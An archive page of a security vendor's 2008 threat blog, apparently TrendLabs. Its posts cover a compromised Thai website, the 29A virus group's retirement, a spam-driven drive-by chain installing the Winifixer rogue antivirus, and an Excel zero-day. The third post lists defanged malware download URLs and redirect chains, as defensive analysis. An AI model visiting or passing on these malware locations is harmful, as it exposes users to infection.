Archive for March 9th, 2008
March 9th, 2008 by Joseph Pacamarra (Threats Analyst)
Research Project Manager Ivan Macalintal reported a few hours ago that another Thailand-based Web hosting site appears to have been compromised to serve malware.
APAC-Regional TrendLabs Team immediately probed and analyzed the attack layout for the ill-fated www.ictbannok.com and we identified a tricky injection, which was prematurely implemented.
Based on our analysis, the main site is just about to be heavily laden with scripts when it was first reported. Going further, since it looks like a dead end when we tried a different avenue and since the main page itself is just like a site with a script gone bad, we found this:
|
http://www.ictbannok.com /*
(Cloaking with a 404 error still heavily laden with an encrypted script which lead to)
|
hxxp://www.ictbannok.com.96fad701b73f1f53.2traff.cn/traff2.cn/
|
Host Location Estiona
|
Host Location European Union
[Russian Federation]
|
The following malicious files are set to drop at this point namely
Troj_SHEUR.DZJ and TROJ_INJECT.IS
|
Host Location Ukraine
|
TSPY_LDPINCH.JR
These tiers were brought down 20 minutes or less after the probing was done. Too late for the authors of the attack, their tracks were traced back pinpointing the actual file that they were hoping to implement using Obfuscation and iFrame as a drop-off point.
With coordinated effort from APAC-RTL spearheaded by Oscar R., Trend Micro Thailand Office by Wan K. and Kitisak J. of ThaiCert – the ictbannok.com site administrator was advised about the incident and had the site cleaned in no time. Now it’s back to its regular business.
Trend Micro already detects these files since the release of malware control patch number 5.144.05 using scan engine 8.5001002 or later.
March 9th, 2008 by JM Hipolito (Technical Communications)
Members of the old school virus writers group 29A may have grown out of virus writing, as their last active member has announced the group’s retirement, The Register reports.
The underground VXer group responsible for the first Win 2000 virus and first 64bit virus were the creators of early mobile malware that mainly infected PDAs. The group called it quits after several members left the group early this year. Their last active member VirusBuster reportedly tried to contact the known key member ValleZ to decide on the fate of the group but to no avail, leading to the announcement.
This looming demise of the old School Virus writers scene stresses the change of the primary motivation in today’s threat landscape, going from recognition and intellectual curiosity to profit.
This retirement can be a turn for the better or the worse, must these virus writers decide on ceasing with malware creation or joining with the more shady malware authors of today. But then, the idea of these skilled individuals using their expertise in going against malware and not creating them for a change is quite more interesting, and much more favorable.
March 9th, 2008 by Loucif Kharouni (Threats Analyst)
While checking my personal spam emails received yesterday, I got interested on a certain email asking the user to view adult pictures by clicking on the following picture:
Once you click on the picture, it is linked to hxxp://{BLOCKED}-carvalhal.pt/tits.exe, a malicious file detected as TROJ_SHEUR.HD (the link, however, is no longer available since yesterday afternoon).
Once I got hold of this file, I was curious to know what could be on the main page of this web site. So I just typed hxxp://{BLOCKED}-carvalhal.pt on my browser’s address bar. Now I got really infected by a succession of malware loading in memory, reminding me of a 404 toolkit which at this end of its infection installs a rogue anti-virus product named winifixer in the system:
I decided to take a look closer at the main page’s source code, revealed to contain 2 scripts redirecting to 2 different URLs:
Once these scripts are executed, access to your computer becomes near impossible, as it becomes too busy loading iFrames, scripts and malware.
Let’s now take hxxp://{BLOCKED}hosting.net/404.php which redirects us to:
And hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20 redirects us to:
The downloaded file t.php is an encoded script which also redirects us to another location to acquire malware.
Another 2 files are being loaded, an HTM file and a file named svchost.t__ which downloads the following files:
- FR
- |429–hxxp://{BLOCKED}.65.239.42/msc61/u_f1_v34_78.exe
- |406–hxxp://{BLOCKED}.65.239.42/msc61/inst250.exe
- |428–hxxp://{BLOCKED}.65.239.42/msc61/krab.exe
- |251–hxxp://{BLOCKED}.54.89.222/loader.exe
- |230–hxxp://{BLOCKED}.65.239.42/msc61/ldig002.exe
- |437–hxxp://{BLOCKED}.65.239.42/msc61/terasole.exe
- |374–hxxp://{BLOCKED}.65.239.42/msc61/2302.exe
- |
To summarize the Web site architecture on how all of this happens, here is a short picture:
hxxp://{BLOCKED}-carvalhal.pt JS_CLICKER.ZU
|
|
|link
---> hxxp://{BLOCKED}hosting.net/404.php
|
|
|script
---> hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20
|
|
|iframe
---> hxxp://{BLOCKED}nhex.org/t.php
Here are all the URLs called in this threat:
- hxxp://{BLOCKED}-carvalhal.pt/tits.exe
- hxxp://{BLOCKED}-carvalhal.pt/
- hxxp://{BLOCKED}forama.com/tds/in.cgi
- hxxp://{BLOCKED}hosting.net/404.php
- hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20
- hxxp://{BLOCKED}nhex.org/t.php
- hxxp://{BLOCKED}8.72.168.176/e-n0303vt/index.php
- hxxp://{BLOCKED}5.93.219.206/gr/index.php
- hxxp://{BLOCKED}landdreams.com/check/versionl.php?t=577
- hxxp://{BLOCKED}landdreams.com/check/n14041.htm
- hxxp://{BLOCKED}landdreams.com/check/n14042.htm
The following ones are not called, but knowing the 404 rootkit, I assumed they were existing. I tried to retrieve them and found them to be all working:
- hxxp://{BLOCKED}landdreams.com/check/n14043.htm
- hxxp://{BLOCKED}landdreams.com/check/n14044.htm
- hxxp://{BLOCKED}landdreams.com/check/n14045.htm
- hxxp://{BLOCKED}landdreams.com/check/n14046.htm
- hxxp://{BLOCKED}landdreams.com/check/n14047.htm
- hxxp://{BLOCKED}landdreams.com/check/n14048.htm
- hxxp://{BLOCKED}landdreams.com/check/n14049.htm
By decrypting some code within some of the HTM files above, I found the following links to be malicious:
- http://{BLOCKED}earscontract.com/check/vers195.php?q=3
- http://{BLOCKED}earscontract.com/check/vers195.php
- http://{BLOCKED}.93.219.206/gr/ - fake apache error, due to Winifixer installation
- http://{BLOCKED}.93.219.206/gr/loader.exe
- http://{BLOCKED}.93.219.206/1stat/get_exa.php
- http://{BLOCKED}.93.219.206/1stat/get_exb.php
- http://{BLOCKED}.93.219.206/1stat/get_exc.php
- http://{BLOCKED}.93.21 .206/1stat/get_exd.php
- http://{BLOCKED}.93.219.206/1files/mix/file1.exe
- http://{BLOCKED}.93.219.206/1files/mix/file2.exe
- http://{BLOCKED}.93.219.206/1files/mix/file3.exe
- http://{BLOCKED}.93.219.206/1files/mix/file4.exe
Since yesterday, the malicious script on hxxp://{BLOCKED}-carvalhal.pt/ has been already modified. Trend Micro detects the script as HTML_IFRAME.GQ.
All files gathered have been already submitted as well as the malicious URLs.
An ethereal capture and a video (25Mb) of the whole infection are available on demand.
Here is a short list of all malware detected:
- ctfmona.exe -> TROJ_DLOADER.JG
- Fsd9mk4g.dll -> TROJ_DLOADER.DUF
- inst250.exe -> TROJ_DROPPER.DRL
- Jfs9jg.dll -> TROJ_SMALL.BKJ
- krab.exe -> TROJ_AGENT.WNQ
- ldig002.exe ->TROJ_DLOADER.ENR
- msgk429.exe -> TROJ_DNSCHANGE.Y
- symavc32.sys -> TROJ_ROOTKIT.EZ
- u_f1_v34_78.exe ->TROJ_DNSCHANGE.Y
- winlogan.exe -> TROJ_DLOADER.DJH
- Wmgq44.sys -> TROJ_ROOTKIT.EZ
- ieupdr2.exe -> TROJ_DLOADER.LSI
- ie_updates3r.exe -> TROJ_DLOADER.LSI
- jf-carvalhal[1].txt -> JS_CLICKER.ZU
- loader.exe -> TROJ_CUTWAIL.AR
- msgk251.exe -> TROJ_CUTWAIL.AR
- nwan.dat -> TROJ_PROXY.TO
- terasole.exe -> BKDR_MOMIBOT.B
- tits.exe -> TROJ_SHEUR.HD
- WinIFixer.exe -> TROJ_WINFIXER.FD
- winlugan.exe -> TROJ_DLOADER.LSI
- WLCtrl32.dll TROJ_AGENT.ANX
March 9th, 2008 by Joseph Cepe (Threats Analyst)
XLS files specially designed to exploit a currently unpatched vulnerability in Microsoft Excel (identified as CVE-2008-0081) are reportedly being sent as email attachments in the wild.
The attachments, which arrive either as OLYMPIC.XLS or SCHEDULE.XLS are capable of dropping and executing Windows binary executables. This Trojan also drops a non-malicious Excel file and opens it upon execution to trick the user that it is the attached Excel file. Below are screenshots of the dropped Excel files of OLYMPIC.XLS and SCHEDULE.XLS respectively.
Both OLYMPIC.XLS and SCHEDULE.XLS are observed to use similar exploit templates and even allow malware writers to customize the exploit to perform other routines.
With the release of a security patch from Microsoft still a week away, malware authors are using this window of opportunity to infect a large number of computers. More information on this exploit can be found on this Microsoft Security Advisory.
Trend Micro advises users to be wary of opening unsolicited email messages, much more of files attached to them. Trend Micro already detects the above files as TROJ_MDROP.AH as of Control Pattern 5.136.12.
